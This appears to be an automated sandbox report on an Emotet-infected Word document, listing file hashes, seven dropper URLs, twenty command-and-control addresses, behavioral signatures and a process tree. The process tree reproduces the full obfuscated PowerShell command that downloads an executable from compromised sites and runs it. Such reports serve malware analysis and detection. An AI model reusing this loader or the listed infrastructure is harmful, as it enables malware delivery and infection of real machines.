Analysis

  • max time kernel
    141s
  • max time network
    146s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    29-10-2020 13:00

General

  • Target

    emotet_e1_75fc337dd52e7d9cd46cb3a7938551eeefc05a67075a62e6442a0b6501c4fd0a_2020-10-29__125734253876._doc.doc

  • Size

    288KB

  • MD5

    04d224ec52eb178906699f26756254fa

  • SHA1

    b9387fc3417846ce5f567e258644b6b45d7c135e

  • SHA256

    75fc337dd52e7d9cd46cb3a7938551eeefc05a67075a62e6442a0b6501c4fd0a

  • SHA512

    2916a9630eb386bd6694d456c47c8b173289fd866a4787d25b3fd8b7906f5670c14eea5f1b13a283772d28c9159ba1c8bde03c8f97826c0b83b52527a45b4e8d

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://innhanmachn.com/wp-admin/sA/

exe.dropper

http://shomalhouse.com/wp-includes/ID3/IDz/

exe.dropper

http://blog.martyrolnick.com/wp-admin/Spq/

exe.dropper

https://www.frajamomadrid.com/wp-content/g/

exe.dropper

https://pesquisacred.com/vmware-unlocker/daC/

exe.dropper

https://medhempfarm.com/wp-admin/Lb/

exe.dropper

http://ienglishabc.com/cow/2BB/

Extracted

Family

emotet

Botnet

Epoch1

C2

192.198.91.138:443

70.39.251.94:8080

87.230.25.43:8080

94.23.62.116:8080

128.92.203.42:80

2.45.176.233:80

202.134.4.210:7080

46.101.58.37:8080

12.163.208.58:80

200.24.255.23:80

76.121.199.225:80

186.193.229.123:80

190.24.243.186:80

201.71.228.86:80

188.251.213.180:80

201.49.239.200:443

104.131.41.185:8080

172.104.169.32:8080

37.187.161.206:8080

70.32.84.74:8080

rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Emotet Payload 4 IoCs

    Detects Emotet payload in memory.

  • Blacklisted process makes network request 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e1_75fc337dd52e7d9cd46cb3a7938551eeefc05a67075a62e6442a0b6501c4fd0a_2020-10-29__125734253876._doc.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:3240
  • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
    POwersheLL -ENCOD $ 1 D 2     = [ t Y p E ] ( " { 3 } { 1 } { 4 } { 5 } { 0 } { 2 } " - f   ' e c T o ' , ' S t e M . ' , ' R y ' , ' s y ' , ' I o . ' , ' d i R ' ) ;         $ t J 8 m 4 B   = [ T Y p e ] ( " { 2 } { 4 } { 5 } { 1 } { 3 } { 0 } " - f   ' r ' , ' i N T m A n A g ' , ' s Y s t e M . n E ' , ' e ' , ' T ' , ' . S e r V I c E p O ' )   ;     $ Y s a 2 1 2 g = ( ' N ' + ( ' b 7 i b 0 ' + ' 0 ' ) ) ; $ S 9 5 c z 3 4 = $ I 0 p h s d k   +   [ c h a r ] ( 6 4 )   +   $ I x d b x t o ; $ Q d f g 2 c p = ( ( ' C h n s ' + ' 7 ' ) + ' 2 ' + ' d ' ) ;     ( d I R   v a r i A B l e : 1 D 2 ) . v a l u E : : " C R ` e A t e D i r ` e c t o r y " ( $ H O M E   +   ( ( ( ' 8 U ' + ' L ' ) + ( ' P j ' + ' q ' ) + ( ' 6 t 3 ' + ' _ 8 U L ' + ' J v n ' + ' k ' ) + ( ' 7 ' + ' y k ' ) + ( ' 8 U ' + ' L ' ) ) . " R ` e ` p l a c e " ( ( ' 8 ' + ' U L ' ) , ' \ ' ) ) ) ; $ Q o 0 8 j c i = ( ' F ' + ' 5 ' + ( ' o c x ' + ' e x ' ) ) ;   (     I T E M     v A R I A b l E : T j 8 M 4 B   ) . V A l U e : : " S e C ` U ` R I ` T y P R o T O c ` O L "   =   ( ( ' T l ' + ' s 1 ' ) + ' 2 ' ) ; $ R 7 w 0 5 3 i = ( ( ' N u e ' + ' l 2 ' ) + ' 4 ' + ' k ' ) ; $ T e d b r 0 0   =   ( ' N ' + ' 1 p ' + ( ' j u r ' + ' 3 u ' ) ) ; $ H _ 8 y n i 0 = ( ' J 6 ' + ' a ' + ( ' f ' + ' f v 6 ' ) ) ; $ R o z 0 9 d p = ( ' V ' + ( ' t 9 ' + ' 1 o p h ' ) ) ; $ G l k v f 7 b = $ H O M E + ( ( ' { 0 ' + ' } P j q 6 ' + ' t ' + ' 3 _ ' + ' { 0 ' + ' } J v n k 7 y k { 0 } ' )   - F [ C h a r ] 9 2 ) + $ T e d b r 0 0 + ( ' . e ' + ' x e ' ) ; $ A d s 4 m x g = ( ( ' E ' + ' 2 n ' ) + ' 0 j ' + ' q o ' ) ; $ Q 4 b 1 g 5 n = . ( ' n e w - o ' + ' b ' + ' j e c ' + ' t ' )   n E t . W E B c L i e N t ; $ B o i e p 0 1 = ( ( ( ' h t ' + ' t p : ] [ ' + '   ' ) + ' 1 ' + ( ( ' )   ' ) ) + ' j j ' + ( ( ' k g S   [ ]   [ ] w ' + ' ] [ ' + '   1 ) ' + '   ' ) ) + ( ' j j ' + ' k g S   [ ] ' ) + ( '   [ ] w i ' + ' n n h ' ) + ( ' a n m a ' + ' c h n . ' ) + ( ( ' c o m ] ' + ' [   1 )   ' ) ) + ' j ' + ( ' j k g S ' + '   [ ] ' ) + ( '   [ ] ' + ' w ' ) + ' w p ' + ( ' - ' + ' a d m ' ) + ( ( ' i n ] [   ' + ' 1 ) ' + '   j ' ) ) + ( ' j ' + ' k g ' ) + ( ' S   [ ] ' + '   [ ] ' ) + ' w ' + ( ' s A ' + ' ] ' ) + ' [ ' + ( ( '   1 ' + ' )   j j k g ' + ' S ' ) ) + '   ' + ' [ ' + ( ' ]   ' + ' [ ' ) + ' ] w ' + ' @ h ' + ( ( ' t t p : ' + ' ] ' + ' [   ' + ' 1 )   j j ' ) ) + ( ' k ' + ' g S   ' ) + ( ' [ ] ' + '   ' ) + ' [ ' + ' ] ' + ( ( ' w ] [ ' + '   1 ) ' ) ) + ( '   j ' + ' j ' ) + ( ' k g S   [ ] ' + '   [ ] ' + ' w s h ' ) + ' o m ' + ' a l ' + ( ' h o u s e ' + ' . c o ' ) + ( ' m ] ' + ' [ ' ) + '   1 ' + ( ( ' ) ' + '   j j k g ' ) ) + ( ' S   ' + ' [ ] ' ) + ( '   [ ] w w p - ' + ' i n ' + ' c ' + ' l u ' ) + ' d e ' + ( ' s ' + ' ] [ ' ) + '   1 ' + ( ( ' )   ' ) ) + ( ' j ' + ' j k ' ) + ' g ' + ' S   ' + ( ' [ ] ' + '   [ ' ) + ( ' ] w ' + ' I ' ) + ( ' D 3 ' + ' ] [ ' ) + '   1 ' + ' ) ' + ( '   j j k ' + ' g ' ) + ( ' S   ' + ' [ ] ' ) + '   ' + ( ( ' [ ' + ' ] w I ' + ' D z ] [   1 ) ' ) ) + ( '   j j k g ' + ' S ' ) + '   ' + ( ' [ ]   ' + ' [ ' + ' ] w @ h ' ) + ( ' t t p ' + ' : ] ' + ' [   ' ) + ( ( ' 1 ) ' ) ) + ( '   ' + ' j j k g S   ' + ' [ ]   ' ) + ( ' [ ] ' + ' w ] [ ' ) + ( ( '   ' + ' 1 ) ' ) ) + ( '   ' + ' j j k ' ) + ( ' g ' + ' S   [ ] ' ) + ( '   [ ' + ' ] ' ) + ' w b ' + ' l o ' + ( ' g ' + ' . m a ' ) + ( ' r ' + ' t y r ' ) + ( ' o l ' + ' n i ' ) + ( ' c k . ' + ' c o m ' ) + ' ] ' + ( ' [ ' + '   1 ' ) + ( ( ' ) ' + '   j ' ) ) + ' j k ' + ( ' g S ' + '   [ ]   ' + ' [ ' ) + ( ' ] w w p ' + ' - ' + ' a d m ' ) + ( ' i n ' + ' ] ' ) + ( ( ' [   1 )   ' + ' j j ' ) ) + ' k ' + ( ' g S   [ ' + ' ]   ' ) + ( ' [ ' + ' ] w S ' ) + ( ' p q ] ' + ' [   1 ' ) + ( ( ' )   ' ) ) + ' j ' + ' j k ' + ( ' g S   [ ]   [ ] ' + ' w ' + ' @ h t t ' ) + ' p ' + ' s : ' + ' ] ' + ( ( ' [   ' + ' 1 )   j ' + ' j k g S   ' ) ) + ' [ ] ' + '   ' + ( ' [ ' + ' ] w ] ' ) + ' [ ' + '   1 ' + ( ( ' )   ' ) ) + ' j j ' + ( ' k g S   [ ]   [ ' + ' ] w w w w ' + ' . f ' ) + ' r ' + ( ' a j a m o m ' + ' a d ' + ' r i ' + ' d . c ' + ' o m ' ) + ( ' ] ' + ' [   1 ' ) + ( ( ' )   j ' + ' j ' ) ) + ' k g ' + ' S   ' + ( ' [ ]   [ ' + ' ] w ' ) + ( ' w p ' + ' - ' ) + ( ' c o n t ' + ' e ' ) + ( ' n t ' + ' ] ' ) + ' [   ' + ' 1 ' + ( ( ' ) ' + '   j ' ) ) + ( ' j k ' + ' g ' ) + ' S ' + ( '   [ ' + ' ] ' ) + ( '   ' + ' [ ] w g ] ' ) + ( ( ' [   1 ) ' + '   j ' + ' j k g ' ) ) + ' S   ' + ( ' [ ] ' + '   ' ) + ( ' [ ' + ' ] w @ h ' ) + ' t t ' + ( ( ' p ' + ' s : ' + ' ] [   1 ' + ' )   ' + ' j j k ' + ' g S   [ ]   ' ) ) + ( ' [ ] w ] [ ' + '   ' ) + ( ( ' 1 ) ' + '   ' ) ) + ( ' j j k g ' + ' S   [ ' + ' ] ' ) + '   [ ' + ' ] w ' + ( ' p ' + ' e s q u i ' ) + ( ' s ' + ' a c ' ) + ' r e ' + ' d ' + ( ( ' . ' + ' c o m ] [   1 )   j j ' + ' k ' ) ) + ' g ' + ' S   ' + ' [ ] ' + ( '   [ ] w ' + ' v m w ' ) + ( ' a r ' + ' e - u n l ' ) + ( ' o c k ' + ' e ' ) + ( ' r ' + ' ] [   1 ' ) + ( ( ' )   ' ) ) + ( ' j ' + ' j k ' ) + ' g ' + ( ' S   [ ' + ' ]   ' ) + ( ' [ ' + ' ] w ' ) + ' d a ' + ' C ' + ' ] ' + ' [ ' + ( ( '   ' + ' 1 )   ' + ' j j ' ) ) + ( ' k g ' + ' S ' ) + '   ' + ( ' [ ] ' + '   ' ) + ' [ ] ' + ' w ' + ' @ ' + ( ' h t ' + ' t p ' ) + ' s : ' + ' ] [ ' + ( ( '   1 ) ' + '   ' ) ) + ' j ' + ' j ' + ( ' k ' + ' g S ' ) + ( '   [ ' + ' ] ' ) + ( '   [ ' + ' ] ' ) + ( ' w ] [   ' + ' 1 ' ) + ' ) ' + '   ' + ( ' j j ' + ' k g S   ' ) + ' [ ' + ( ' ] ' + '   [ ] w m e ' ) + ' d ' + ( ' h ' + ' e m ' ) + ( ( ' p f a ' + ' r m . c ' + ' o m ] ' + ' [   1 ) ' ) ) + '   ' + ( ' j j ' + ' k g ' ) + ( ' S ' + '   [ ]   [ ' ) + ( ' ] w w p ' + ' - a ' ) + ' d m ' + ( ' i n ' + ' ] ' ) + ' [ ' + '   ' + ' 1 ' + ( ( ' )   j j k g S   [ ' + ' ] ' + '   [ ] w ' + ' L ' ) ) + ' b ' + ( ( ' ] [   1 ' + ' )   j j ' ) ) + ( ' k ' + ' g S ' + '   [ ] ' ) + '   ' + ' [ ] ' + ' w ' + ' @ h ' + ( ' t ' + ' t p : ] [   1 ' ) + ' ) ' + ( '   j ' + ' j k g S   [ ] ' + '   ' ) + ' [ ' + ( ' ] w ] ' + ' [ ' ) + ( ( '   1 ' + ' ) ' ) ) + ( '   ' + ' j j ' ) + ( ' k g ' + ' S   [ ] ' + '   [ ] ' ) + ' w ' + ( ' i e n ' + ' g ' ) + ( ' l i ' + ' s h a ' ) + ' b c ' + ( ' . c ' + ' o ' ) + ( ( ' m ] [ ' + '   1 ) ' + '   j ' ) ) + ( ' j k ' + ' g S ' ) + ( ( '   ' + ' [ ] ' + '   [ ' + ' ] w c ' + ' o w ] [   1 ' + ' )   ' ) ) + ' j j ' + ' k ' + ( ' g S ' + '   ' ) + ' [ ' + ' ] ' + ( '   ' + ' [ ] ' ) + ( ' w 2 B ' + ' B ' ) + ( ( ' ] [   ' + ' 1 ) ' ) ) + '   ' + ' j ' + ( ' j k ' + ' g ' ) + ( ' S   ' + ' [ ]   ' ) + ' [ ] ' + ' w ' ) ) . " R ` e p ` l a c E " ( ( ( ' ] [ ' + ( ( '   ' + ' 1 )   j j k g ' + ' S   [ ] ' ) ) + '   ' + ( ' [ ] ' + ' w ' ) ) ) , ( [ a r r a y ] ( ' / ' ) , ( ' x ' + ' w e ' ) ) [ 0 ] ) . " S ` P l i T " ( $ O d 7 c c w 9   +   $ S 9 5 c z 3 4   +   $ O n 5 5 l j g ) ; $ Q 9 e c c c 5 = ( ( ' F ' + ' o 4 ' ) + ' g ' + ( ' 2 ' + ' r k ' ) ) ; f o r e a c h   ( $ S 7 m _ b s h   i n   $ B o i e p 0 1 ) { t r y { $ Q 4 b 1 g 5 n . " d ` o W n L ` O a ` D f I l E " ( $ S 7 m _ b s h ,   $ G l k v f 7 b ) ; $ E 4 f k t e a = ( ' D ' + ' l i ' + ( ' 0 ' + ' 4 n _ ' ) ) ; I f   ( ( & ( ' G e t ' + ' - I t e ' + ' m ' )   $ G l k v f 7 b ) . " l ` e ` N g t h "   - g e   4 7 9 1 2 )   { ( [ w m i c l a s s ] ( ' w i ' + ( ' n ' + ' 3 2 ' ) + ' _ P ' + ( ' r ' + ' o c e s s ' ) ) ) . " C R ` e ` A t E " ( $ G l k v f 7 b ) ; $ K l m m l c r = ( ( ' V 6 z ' + ' 4 3 ' + ' q ' ) + ' d ' ) ; b r e a k ; $ M y s e 8 p t = ( ' S 8 ' + ( ' 2 6 6 j ' + ' 7 ' ) ) } } c a t c h { } } $ X w n f 9 b 5 = ( ' R _ ' + ( ' 1 k l ' + ' w ' ) + ' o ' ) 
    1⤵
    • Process spawned unexpected child process
    • Blacklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:3528
  • C:\Users\Admin\Pjq6t3_\Jvnk7yk\N1pjur3u.exe
    C:\Users\Admin\Pjq6t3_\Jvnk7yk\N1pjur3u.exe
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2628
    • C:\Windows\SysWOW64\gcdef\usp10.exe
      "C:\Windows\SysWOW64\gcdef\usp10.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      PID:1660
  • \??\c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NgcSvc
    1⤵
      PID:3340
    • \??\c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s DeviceAssociationService
      1⤵
        PID:2240
      • \??\c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s NgcCtnrSvc
        1⤵
        • Modifies data under HKEY_USERS
        PID:744

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Discovery

      Query Registry

      2
      T1012

      System Information Discovery

      2
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\Pjq6t3_\Jvnk7yk\N1pjur3u.exe
        MD5

        e35c8103f924210d388d02edec91ff1c

        SHA1

        a2436b72d49bc344ac3f0226f09aa34f9e2b2f8a

        SHA256

        c63eef43cec61412ba12f6c405faad6a697ad134edd7375bafd47a759bd352cb

        SHA512

        ef54e996cbc0a95353f4014858aa1d707786c175a0a60d1ec6d7c8f587e48385d367b333fccb9dbd6648367c2bc8165a411f056245f121e40af02d995bdb6971

      • C:\Users\Admin\Pjq6t3_\Jvnk7yk\N1pjur3u.exe
        MD5

        e35c8103f924210d388d02edec91ff1c

        SHA1

        a2436b72d49bc344ac3f0226f09aa34f9e2b2f8a

        SHA256

        c63eef43cec61412ba12f6c405faad6a697ad134edd7375bafd47a759bd352cb

        SHA512

        ef54e996cbc0a95353f4014858aa1d707786c175a0a60d1ec6d7c8f587e48385d367b333fccb9dbd6648367c2bc8165a411f056245f121e40af02d995bdb6971

      • C:\Windows\SysWOW64\gcdef\usp10.exe
        MD5

        e35c8103f924210d388d02edec91ff1c

        SHA1

        a2436b72d49bc344ac3f0226f09aa34f9e2b2f8a

        SHA256

        c63eef43cec61412ba12f6c405faad6a697ad134edd7375bafd47a759bd352cb

        SHA512

        ef54e996cbc0a95353f4014858aa1d707786c175a0a60d1ec6d7c8f587e48385d367b333fccb9dbd6648367c2bc8165a411f056245f121e40af02d995bdb6971

      • memory/1660-19-0x0000000002100000-0x0000000002110000-memory.dmp
        Filesize

        64KB

      • memory/1660-18-0x00000000020E0000-0x00000000020F2000-memory.dmp
        Filesize

        72KB

      • memory/1660-16-0x0000000000000000-mapping.dmp
      • memory/2628-15-0x0000000002190000-0x00000000021A0000-memory.dmp
        Filesize

        64KB

      • memory/2628-14-0x0000000002800000-0x0000000002812000-memory.dmp
        Filesize

        72KB

      • memory/3240-4-0x0000022A0D82C000-0x0000022A0D8C4000-memory.dmp
        Filesize

        608KB

      • memory/3240-5-0x0000022A0D741000-0x0000022A0D744000-memory.dmp
        Filesize

        12KB

      • memory/3240-0-0x00007FFD84C20000-0x00007FFD85257000-memory.dmp
        Filesize

        6.2MB

      • memory/3240-3-0x0000022A0D82C000-0x0000022A0D8C4000-memory.dmp
        Filesize

        608KB

      • memory/3240-2-0x0000022A0D82C000-0x0000022A0D8C4000-memory.dmp
        Filesize

        608KB

      • memory/3240-1-0x0000022A0D82C000-0x0000022A0D8C4000-memory.dmp
        Filesize

        608KB

      • memory/3528-11-0x0000021D623B0000-0x0000021D623B1000-memory.dmp
        Filesize

        4KB

      • memory/3528-10-0x0000021D4A1F0000-0x0000021D4A1F1000-memory.dmp
        Filesize

        4KB

      • memory/3528-9-0x00007FFD7E3E0000-0x00007FFD7EDCC000-memory.dmp
        Filesize

        9.9MB